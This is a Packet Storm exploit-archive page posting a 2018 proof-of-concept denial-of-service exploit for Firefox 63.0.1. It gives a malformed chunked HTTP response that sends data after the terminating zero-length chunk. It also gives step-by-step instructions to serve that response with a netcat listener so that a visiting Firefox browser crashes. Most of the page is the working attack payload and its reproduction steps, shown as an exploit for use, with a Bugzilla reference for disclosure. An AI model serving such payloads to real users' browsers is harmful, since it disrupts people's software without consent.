what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mozilla Firefox 63.0.1 Denial Of Service

Mozilla Firefox 63.0.1 Denial Of Service
Posted Dec 4, 2018
Authored by SAIKUMAR CHEBROLU

Mozilla Firefox version 63.0..1 suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | 8654af0473c719bc108f1f63dcebb8c2ae0727d8037d03507af77a0123abe04a

Mozilla Firefox 63.0.1 Denial Of Service

Change Mirror Download
# Exploit Title: Mozilla Firefox 63.0.1 - Denial of Service (PoC)
# Date: 2018-11-29
# Exploit Author: SAIKUMAR CHEBROLU
# Vendor Homepage: https://www.mozilla.org/en-US/firefox/new/
# Bugzilla report: https://bugzilla.mozilla.org/show_bug.cgi?id=1504512
# Version: Firefox 63.0.1
# Tested on: Windows 10
# CVE : No CVE is been assigned to this bug.

# To exploit this vulnerability please follow the below steps.
# Firefox is being crashed, when it tried to process the chunked data. when Transfer-Encoding header
# is used, we suppose to send the data in the chunks form. When all the chunks being transferred,
# we need to tell the client with chunk length zero. so that it understands chunked stream completed.

# But if we send the data after sending zero length, then firefox not able to understand it,
# and it being crashed.

# Example:

5

Don't

5

be af

5

firef

5

ox is

0

Crash (after saying it is end, we still sending some data)

\r\n

# here we are saying no chunked data after this.so that it should end with \r\n. But we
# are sending some data after this also. Like

# Steps to reproduce the crash

1)download the firefoxcrash.txt

2)nc -lp 8000 < firefoxcrash.txt

3)browe the url from firefox like http://localhost:8000

4)then close the netcat client. then you will obserev the firefox crash.

# fireforcrash.txt

HTTP/1.1 200 ok
Content-type: application/octet-stream
Content-disposition: attachment; filename="crash.txt"
Transfer-Encoding: chunked
Connection: close

5
I am
5
be a
5
fraid
5
to l
5
ook a
5
t thi
5
s mes
5
sage.
5
It i
5
s com
5
plete
5
ly ha
5
rmles
5
s. Re
5
ally!
0
foobar


Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    9 Files
  • 25
    Oct 25th
    10 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close